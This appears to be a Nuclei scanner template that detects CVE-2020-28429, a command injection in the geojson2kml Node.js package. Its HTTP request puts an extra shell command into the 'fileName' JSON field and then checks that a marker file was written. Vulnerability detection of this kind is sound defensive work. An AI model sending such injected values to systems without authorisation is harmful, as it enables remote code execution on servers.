id: CVE-2020-28429 info: name: geojson2kml - Command Injection author: eeche,chae1xx1os,persona-twotwo,soonghee2 severity: critical description: | Detects command injection vulnerability by checking if `hacked.txt` is created and contains the expected content. impact: | Successful exploitation of this vulnerability could result in unauthorized access, remote code execution, privilege escalation remediation: | Do not use geojson2kml. There is no fixed version for geojson2kml. reference: - https://snyk.io/vuln/SNYK-JS-GEOJSON2KML-1050412 - https://github.com/advisories/GHSA-w83x-fp72-p9qc - https://nvd.nist.gov/vuln/detail/CVE-2020-28429 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-28429 cwe-id: CWE-78 epss-score: 0.63305 epss-percentile: 0.99098 cpe: cpe:2.3:a:geojson2kml_project:geojson2kml:*:*:*:*:*:node.js:*:* metadata: max-request: 1 vendor: geojson2kml_project product: geojson2kml framework: node.js tags: cve,cve2020,rce,geojson2kml,file-upload,intrusive,vuln variables: filename: '{{rand_base(6)}}' http: - raw: - | POST /convert HTTP/1.1 Host: {{Hostname}} Content-Type: application/json { "fileName": "& echo \"{{randstr}}\" > {{filename}}.txt && ls", "geoJsonData": { "type": "FeatureCollection", "features": [ { "type": "Feature", "geometry": { "type": "Point", "coordinates": [102.0, 0.5] }, "properties": { "prop0": "value0" } } ] } } - | GET /file/{{filename}}.txt HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body_2 words: - "{{randstr}}" - type: word part: header_2 words: - "text/html" - type: status status: - 200 # digest: 4b0a00483046022100c65912eedc79f93a5d1788b5baca899a284175567732132feacab166afcca85c022100b487b45093ef7bb7fe08d7390feb42d36db0208b686a32442a0d2da1f2b25c7d:922c64590222798bb761d5b6d8e72950